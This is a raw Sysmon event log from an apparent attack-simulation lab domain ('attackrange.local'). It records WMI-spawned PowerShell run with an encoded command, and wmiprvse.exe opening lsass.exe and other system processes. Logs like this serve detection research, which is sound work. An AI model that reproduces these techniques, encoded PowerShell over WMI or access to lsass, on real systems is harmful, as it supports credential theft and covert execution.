16:52:52.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237617Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237616Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237615Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002237614Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.950{05ADC7E1-6D64-603E-7EAA-00000000AD01}4120ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237613Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.950{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6D64-603E-85AA-00000000AD01}15020C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002237612Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.934{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6D64-603E-84AA-00000000AD01}9536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002237611Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.934{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237610Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.934{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237609Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.934{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237608Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.934{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237607Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.934{05ADC7E1-229F-6039-1600-00000000AD01}154011112C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-80AA-00000000AD01}5464C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237606Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.934{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6D64-603E-84AA-00000000AD01}9536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002237605Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.934{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-80AA-00000000AD01}5464C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237604Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.934{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-84AA-00000000AD01}9536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002237603Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.945{05ADC7E1-6D64-603E-84AA-00000000AD01}9536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -NoProfile -EncodedComma VwByAGkAdABlAC0ASABvAHMAdAAgAGUANAA0ADIAOABjAGMAMQAtADIANQAxADUALQA0AGQANQA3AC0AYgBiADYAZAAtAGYAZABhADIAYQA0AGQAMgA1ADgAYQBjAA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 11241100x80000000000000002237602Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.934{05ADC7E1-6D64-603E-82AA-00000000AD01}13276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_hqmeu5tk.jtw.ps12021-03-02 16:52:52.934 23542300x80000000000000002237601Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.934{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D20C71B98B272D58710DEF84632D2F5,SHA256=12821129F0691E60239D2EA1B2347F5F5E3ED8B052ACA24E369761E3566DDA2D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237600Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.918{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-82AA-00000000AD01}13276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237599Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.918{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-83AA-00000000AD01}14172C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237598Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.918{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-82AA-00000000AD01}13276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237597Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-81AA-00000000AD01}11880C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237596Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-80AA-00000000AD01}5464C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237595Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-7FAA-00000000AD01}10308C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237594Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-7EAA-00000000AD01}4120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237593Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237592Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 